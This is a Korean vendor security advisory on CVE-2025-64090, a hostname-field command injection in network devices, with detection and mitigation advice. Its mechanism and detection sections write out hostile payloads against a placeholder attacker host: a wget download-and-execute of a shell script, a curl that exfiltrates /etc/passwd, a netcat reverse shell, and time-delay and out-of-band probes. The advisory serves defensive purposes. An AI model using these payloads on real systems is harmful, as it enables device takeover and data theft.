CVE 치명적 2026년 1월 9일 · 8분 읽기

CVE-2025-64090: 장비 Hostname 필드를 통한 명령어 삽입으로 전체 시스템 침해 가능

인증된 공격자는 장비의 hostname 필드에 셸 메타문자를 삽입해 임의의 OS 명령을 실행할 수 있습니다. CVSS 10.0. 네트워크 장비와 임베디드 시스템에서 흔히 발견되며, 지속적으로 치명적인 영향을 초래하는 취약점 유형입니다.


CVSS 10.0 — 치명적
항목세부 내용
CVE IDCVE-2025-64090
심각도치명적(CVSS 3.1: 10.0)
취약점 유형OS 명령어 삽입(CWE-78)
공개일2026년 1월 9일
인증 필요 여부예(낮은 권한)
공격 벡터네트워크

CVE-2025-64090란?

CVE-2025-64090은 장비의 hostname 구성 필드가 검증 없이 하위 셸 명령으로 전달되는 명령어 삽입 취약점입니다. 셸 메타문자(;, |, `, $())를 hostname 값에 삽입하면, 인증된 공격자는 의도된 명령 컨텍스트를 벗어나 장비의 관리 프로세스 권한 — 일반적으로 root 권한 — 으로 임의의 OS 명령을 실행할 수 있습니다.

이러한 유형의 취약점은 네트워크 장비, IoT 하드웨어, 라우터, 방화벽, 임베디드 Linux 시스템에서 흔히 발견되며, 이러한 시스템의 웹 기반 관리 인터페이스가 사용자가 제공한 구성 값으로부터 적절한 검증 없이 셸 명령을 구성하기 때문입니다.

⚠ 전체 침해까지의 낮은 장벽

낮은 권한의 계정을 포함해 인증된 모든 사용자가 root 수준의 명령 실행을 달성할 수 있습니다. 기본 또는 취약한 자격 증명이 존재하는 환경에서는 사실상 인증되지 않은 익스플로잇이 됩니다.

명령어 삽입 메커니즘

# 취약한 장비는 셸 명령으로 hostname을 설정합니다:
# system("hostname " + user_input)

# 공격자가 제출하는 hostname:
newhost; wget http://attacker.com/malware.sh -O /tmp/m.sh; sh /tmp/m.sh

# 다음과 같이 실행됩니다:
hostname newhost; wget http://attacker.com/malware.sh -O /tmp/m.sh; sh /tmp/m.sh

# 기타 삽입 패턴:
# 백틱 실행:
`curl http://attacker.com/$(cat /etc/passwd | base64)`

# 서브셸:
$(id >  /var/www/html/pwned.txt)

# 파이프:
validhost | nc attacker.com 4444 -e /bin/sh

영향받는 버전

특정 하드웨어 모델과 펌웨어 버전은 벤더 권고문을 참조하세요. hostname 구성을 노출하는 웹 기반 관리 인터페이스를 가진 네트워크 장비가 주요 위험 표면입니다.

탐지 방법

Hostname 인젝션 테스트


# 수동 테스트: 명령어 삽입 페이로드가 포함된 hostname 제출
# 블라인드 인젝션 확인을 위해 시간 지연 사용
POST /admin/network/hostname
hostname=test%3Bsleep%205

# 응답이 약 5초 지연되면: 취약함

# 대역 외(out-of-band) 확인:
hostname=test%3Bnslookup+attacker.burpcollaborator.net

🔍 KENSAI 탐지: KENSAI의 장비 보안 스캐너는 hostname, DNS, NTP, SNMP 구성을 포함한 관리 인터페이스 필드를 OS 명령어 삽입에 대해 테스트합니다. CVE-2025-64090 패턴은 네트워크 장비 평가 프로필에 포함되어 있습니다.

완화 조치

  1. 벤더 펌웨어 업데이트를 즉시 적용하세요.
  2. 입력 검증: Hostname 필드는 영숫자와 하이픈만 허용해야 합니다(RFC 952/1123 준수).
  3. 안전한 API 사용: 셸 명령 구성을 인수 배열을 받는 시스템 호출로 대체하세요(셸 보간 없이).
  4. 관리 인터페이스 제한: 방화벽 규칙을 통해 관리 UI 접근을 신뢰할 수 있는 IP 범위로 제한하세요.
  5. 기본 자격 증명 변경: 모든 관리 계정이 강력하고 고유한 비밀번호를 사용하도록 하세요.
  6. 네트워크 분할: 관리 인터페이스를 사용자가 접근 가능한 네트워크로부터 격리하세요.

귀하의 네트워크 장비에 명령어 삽입 취약점이 있습니까?

KENSAI는 네트워크 장비와 관리 인터페이스를 스캔해 CVE-2025-64090을 포함한 명령어 삽입 취약점을 찾아냅니다. 공격자가 발판을 마련하기 전에 취약한 장비를 파악하세요.

네트워크 장비 무료 스캔하기

KENSAI Security Research Team 작성 · 더 많은 CVE 분석

관련 기사

프랑스 랜섬웨어 30% 감소 보고, NIS2 시행 효과 — Google 320억 달러 Wiz 인수 마무리, LLM 가드레일 전면 붕괴 CORS 구성 오류 취약점: 탐지 및 예방 완전 가이드 프랑스 ANSSI, NIS2 시행 후 랜섬웨어 감소 보고 — 영국 Companies House GDPR 유출로 수백만 명 노출, 사이버 공격 36% 급증